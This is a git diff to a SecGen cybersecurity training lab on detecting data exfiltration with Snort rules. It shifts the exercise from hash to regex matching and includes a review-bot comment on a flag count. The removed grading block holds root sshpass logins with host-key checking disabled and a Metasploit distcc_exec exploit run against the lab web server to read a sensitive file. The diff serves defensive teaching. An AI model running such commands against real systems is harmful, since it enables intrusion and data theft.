diff --git a/modules/generators/structured_content/hackerbot_config/ids_exfiltration/secgen_metadata.xml b/modules/generators/structured_content/hackerbot_config/ids_exfiltration/secgen_metadata.xml
index b8ca2b4ee..c173ec346 100644
--- a/modules/generators/structured_content/hackerbot_config/ids_exfiltration/secgen_metadata.xml
+++ b/modules/generators/structured_content/hackerbot_config/ids_exfiltration/secgen_metadata.xml
@@ -29,18 +29,10 @@
-
-
-
-
-
-
-
-
diff --git a/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/dlp.md.erb b/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/dlp.md.erb
index 3473eeedc..99eea0a60 100644
--- a/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/dlp.md.erb
+++ b/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/dlp.md.erb
@@ -14,12 +14,18 @@ Hint: you can include your sensitive data directly in a Snort rule. This is very It is fine to monitor all ports, so long as your rule(s) detect transfer of the file. -#### Hash-based exfiltration detection +#### Regular expression-based exfiltration detection -Assuming the data you are protecting is sensitive, you likely don't want your Snort rules to contain direct copies of all your most sensitive data. For this reason, Snort rules can contain hashes to match against. +Assuming the data you are protecting is sensitive, you likely don't want your Snort rules to contain direct copies of all your most sensitive data. For this reason, Snort rules can contain regular expressions to match against. -It is possible to write Snort rules that detect the transfer of the contents of your files, based on hashes, so that the Snort rule does not contain any plain text of your document. +It is possible to write Snort rules that detect the transfer of the contents of your files, based on pattern matching, so that the Snort rule does not contain the sensitive parts of your document. -Hint: consider using the protected\_content keyword in your rule. +Hint: consider using the pcre keyword in your rule. + +> Side note: *Hash-based exfiltration detection*: **you don't need to use this for this lab.** + +> Assuming the data you are protecting is sensitive, you likely don't want your Snort rules to contain direct copies of all your most sensitive data. For this reason, Snort rules can contain hashes to match against. + +> Using newer versions of Snort it is possible to write Snort rules that detect the transfer of the contents of your files, based on hashes (using the protected\_content keyword), so that the Snort rule does not contain any plain text of your document. --- \ No newline at end of file 
diff --git a/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/lab.xml.erb b/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/lab.xml.erb
index 4f721a327..9cfe2d678 100644
--- a/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/lab.xml.erb
+++ b/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/lab.xml.erb
@@ -40,7 +40,7 @@ $sensitive_files_location = "/home/#{$main_user}/trade_secrets/"
- REQUIRED_FLAGS = 10
+ REQUIRED_FLAGS = 3
 while $flags.length < REQUIRED_FLAGS
 $flags << "flag{#{SecureRandom.hex}}"
 Print.err "Warning: Not enough flags provided to hackerbot_config generator, some flags won't be tracked/marked!"
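Review bot: `REQUIRED_FLAGS = 3` is a bare magic number whose only meaning is the number of `<%= $flags.pop %>` calls elsewhere in this template, and nothing in the code ties the two together; the `@@ -167,51 +167,53 @@` hunk below removes one pop, but whether exactly three remain after this commit is not visible from here. The warning on the last context line only fires when fewer than REQUIRED_FLAGS flags are supplied; a pop past the end of `$flags` returns nil and renders as an empty flag, so a count that is too low fails silently. Add a comment on the changed line, e.g. `REQUIRED_FLAGS = 3 # must equal the number of <%= $flags.pop %> calls in this template`, or derive the count from the template text so it cannot drift. The enclosing ERB block starts outside the hunk.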
@@ -167,51 +167,53 @@ Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%= - -<% $rand_alert1 = SecureRandom.hex(3) %> - - - sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $web_server_ip %> 'cp <%= $sensitive_files_location %>clients.csv <%= $rand_tmp_restingplace %>; chmod 644 <%= $rand_tmp_restingplace %>'; stat0=$?; echo -$stat0; sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/var/log/snort/alert /tmp/snort_alert_before; echo --$? - - msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit" - - cat <%= $rand_tmp_restingplace %>; echo --$? - - sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/var/log/snort/alert /tmp/snort_alert_after; echo --$?; diff -n /tmp/snort_alert_before /tmp/snort_alert_after | tail -n 5 | grep <%= $rand_alert1 %> >/dev/null; echo triggered:$?; sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/etc/snort/rules/my.rules /tmp/snort_rules; echo rules:$?; grep '^alert.*msg:".*<%= $rand_alert1 %>.*".*protected_content:"' /tmp/snort_rules >/dev/null; echo good_rule:$? - + + + + + + + + + + + + + + - Update your rule so that it doesn't contain any of the sensitive data. Use hash-based matching. You have a copy in <%= $sensitive_files_location %>clients.csv Use one or more Snort rules to detect unencrypted transport of the file. The alert must include the message "<%= $rand_alert1 %>". + - - good_rule:1 - :( Couldn't find your snort rule on the IDS server in /etc/snort/rules/my.rules. You are missing *protected_content* matching or the message from your rule. - - - triggered:1 - :( Your rule wasn't triggered. - - - triggered:0.*good_rule:0 - :) Well done! <%= $flags.pop %>. 
- - - - -1 - :( Failed to ssh to the web server (<%= $web_server_ip %>) - - - --1 - :( Failed to scp to the ids server (<%= $ids_server_ip %>) - - - --0 - Continuing... - - - :( Something was not quite right... - + + + + + + + + + + + + + + + + + + + + + + + + + + + + - + <% $rand_alert2 = SecureRandom.hex(3) @@ -260,7 +262,7 @@ Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%= - Where else is the sensitive data at rest? Use regexp searches to find the file (not hashes). + Where else is the sensitive data at rest across the various server VMs for the lab? Use regexp searches to find the file (don't use hashes). <%= $rand_tmp_restingplace %> :) <%= $flags.pop %>